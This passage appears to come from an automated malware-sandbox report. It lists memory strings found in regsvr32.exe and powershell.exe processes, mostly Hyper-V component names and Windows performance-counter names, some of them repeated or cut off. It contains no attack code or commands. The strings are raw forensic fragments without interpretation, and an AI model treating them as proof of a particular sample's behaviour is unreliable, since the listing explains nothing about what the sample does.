Hyper-V Virtual Machine Bus
Source: regsvr32.exe, 00000009.00000003.101743560036.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101880620764.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102042264213.000000000551A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition'}]
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partitionll
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor
Source: powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Virtual Machine Bus Pipesd
Source: regsvr32.exe, 00000009.00000003.101743560036.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101880620764.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102042264213.000000000551A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partitionl
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: regsvr32.exe, 0000000E.00000003.101847660733.0000000002F5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt No
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
Source: powershell.exe, 0000000F.00000002.101994038719.000001E26D311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: <!-- IFRpbWUtU3RhbXAgUENBIDIwMTAwDQYJKoZIhvcNAQEFBQACBQDk2nlVMCIYDzIw -->
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
Source: regsvr32.exe, 0000000E.00000003.101847123517.0000000002F5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6242WorkflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O T
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
Source: regsvr32.exe, 0000000E.00000003.101834437886.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101834665417.00000000013C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Proce
Source: regsvr32.exe, 00000009.00000003.101743560036.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101880620764.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102042264213.000000000551A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual Processor+rb
Source: regsvr32.exe, 00000009.00000003.101713203268.0000000001098000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshot4890HWP Request MSR Context Switches/sec4892Guest Run Time4894Idle Time4896% Total Run Time4898% Hypervisor Run Time4900% Guest Run Time4902% Idle Time4904Total Interrupts/sec4788Hyper-V Hypervisor4790Logical Processors4792Partitions4794Total Pages4796Virtual Processors4798Monitored Notifications4800Modern Standby Entries4802Platform Idle Transitions4804HypervisorStartupCost4906Hyper-V Hypervisor Root Partition4908Virtual Processors4910Virtual TLB Pages4912Address Spaces4914Deposited Pages4916GPA Pages4918GPA Space Modifications/sec4920Virtual TLB Flush Entires/sec4922Recommended Virtual TLB Size49244K GPA pages49262M GPA pages49281G GPA pages4930512G GPA pages49324K device pages49342M device pages49361G device pages4938512G device pages4940Attached Devices4942Device Interrupt Mappings4944I/O TLB Flushes/sec4946I/O TLB Flush Cost4948Device Interrupt Errors4950Device DMA Errors4952Device Interrupt Throttle Events4954Skipped Timer Ticks4956Partition Id4958Nested TLB Size4960Recommended Nested TLB Size4962Nested TLB Free List Size4964Nested TLB Trimmed Pages/sec4966Pages Shattered/sec4968Pages Recombined/sec4970I/O TLB Flushes Base4972Hyper-V Hypervisor Root Virtual Processor4974Total Run Time4976Hypervisor Run Time4978Remote Node Run Time4980Normalized Run Time4982Ideal Cpu4984Hypercalls/sec4986Hypercalls Cost4988Page Invalidations/sec4990Page Invalidations Cost4992Control Register Accesses/sec4994Control Register Accesses Cost4996IO Instructions/sec4998IO Instructions Cost5000HLT Instructions/sec5002HLT Instructions Cost5004MWAIT Instructions/sec5006MWAIT Instructions Cost5008CPUID Instructions/sec5010CPUID Instructions Cost5012MSR Accesses/sec5014MSR Accesses Cost5016Other Intercepts/sec5018Other Intercepts Cost5020External Interrupts/sec5022External Interrupts Cost5024Pending Interrupts/sec5026Pending Interrupts Cost5028Emulated Instructions/sec5030Emulated Instructions Cost
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V Hypervisor
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partitionz
Source: regsvr32.exe, 00000009.00000003.101743560036.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101947276329.0000000005204000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056814035.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101880620764.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102042264213.000000000551A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.00000000057BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Pipesl
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DHyper-V Hypervisor Root Partitiond
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
Source: regsvr32.exe, 0000000E.00000003.101833418493.0000000002F66000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101837328418.0000000002F7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitec
Source: regsvr32.exe, 00000009.00000003.101947276329.0000000005204000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056814035.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.00000000057BA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root PartitionlO
Source: powershell.exe, 0000000F.00000002.101919557191.000001E25D4CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
Source: regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101889558229.0000000001377000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.0000000003132000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor.mui
Source: regsvr32.exe, 00000009.00000003.101720211745.0000000002B3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Interrupts/sec4822Timer Interrupts/sec4824Inter-Processor Interrupts Sent/sec4826Processor Halts/sec4828Monitor Transition Cost4830Context Switch Time4832C1 Transitions/sec4834% C1 Time4836C2 Transitions/sec4838% C2 Time4840C3 Transitions/sec4842% C3 Time4844Frequency4846% of Max Frequency4848Parking Status4850Processor State Flags4852Root Vp Index4854Idle Sequence Number4856Global TSC Count4858Active TSC Count4860Idle Accumulation4862Reference Cycle Count 04864Actual Cycle Count 04866Reference Cycle Count 14868Actual Cycle Count 14870Proximity Domain Id4872Posted Interrupt Notifications/sec4874Hypervisor Branch Predictor Flushes/sec4876Hypervisor L1 Data Cache Flushes/sec4878Hypervisor Immediate L1 Data Cache Flushes/sec4880Hypervisor Microarchitectural Buffer Flushes/sec4882Counter Refresh Sequence Number4884Counter Refresh Reference Time4886Idle Accumulation Snapshot4888Active Tsc Count Snapshoth57
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration ServiceJ
Source: regsvr32.exe, 0000000E.00000003.101849158572.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101840281423.0000000002F96000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101837951838.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101847452097.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101848153289.0000000002FBE000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101847619936.0000000002FBF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: kflowServiceHost 4.0.0.06244Workflows Created6246Workflows Created Per Second6248Workflows Executing6250Workflows Completed6252Workflows Completed Per Second6254Workflows Aborted6256Workflows Aborted Per Second6258Workflows In Memory6260Workflows Persisted6262Workflows Persisted Per Second6264Workflows Terminated6266Workflows Terminated Per Second6268Workflows Loaded6270Workflows Loaded Per Second6272Workflows Unloaded6274Workflows Unloaded Per Second6276Workflows Suspended6278Workflows Suspended Per Second6280Workflows Idle Per Second6282Average Workflow Load Time6284Average Workflow Load Time Base6286Average Workflow Persist Time6288Average Workflow Persist Time Base6324Terminal Services6326Active Sessions6328Inactive Sessions6330Total Sessions4806Hyper-V Hypervisor Logical Processor4808Global Time4810Total Run Time4812Hypervisor Run Time4814Hardware Interrupts/sec4816Context Switches/sec4818Inter-Processor Interrupts/sec4820Scheduler Int
Source: regsvr32.exe, 00000009.00000003.101743560036.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101880620764.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102042264213.000000000551A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor
Source: regsvr32.exe, 00000009.00000003.101743560036.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101947276329.0000000005204000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.000000000514F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056814035.00000000012F0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.102056911334.0000000001378000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102054265581.0000000001375000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101880620764.00000000055F3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102046538179.00000000030B5000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.102042264213.000000000551A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.101883897736.0000000005837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
Source: regsvr32.exe, 00000009.00000003.101740776394.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101743560036.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.102021982749.0000000001048000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101753563395.0000000001047000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101945353633.00000000051CC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000009.00000003.101959050599.0000000001047000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
